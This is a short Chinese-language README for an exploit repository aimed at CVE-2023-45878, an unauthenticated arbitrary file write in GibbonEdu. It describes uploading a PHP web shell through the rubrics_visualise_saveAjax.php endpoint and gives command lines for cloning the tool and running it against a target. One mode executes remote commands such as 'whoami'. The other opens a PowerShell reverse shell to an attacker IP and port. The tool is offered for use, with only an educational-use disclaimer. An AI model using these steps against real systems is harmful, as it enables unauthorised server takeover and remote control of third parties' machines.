GibbonEdu 任意文件写入到 Web Shell 执行
本仓库包含针对 CVE-2023-45878 的利用代码,这是 GibbonEdu 中的一个任意文件写入漏洞。该漏洞影响 rubrics_visualise_saveAjax.php 端点,允许未经身份验证的攻击者向 Web 服务器上传任意文件。
此脚本利用该漏洞上传 PHP Web Shell,并可以选择:
脚本支持两种操作模式:
--command (-c):远程执行特定系统命令。--shell (-s):向攻击者监听器触发 PowerShell 反向 Shell。git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <目标域名> -c "whoami"
python3 CVE-2023-45878.py -t <目标域名> -s -i <IP地址> -p <端口>
此脚本仅用于教育目的。未经许可在系统上使用此利用代码属于违法行为。作者不对因使用此代码造成的任何滥用或损害负责。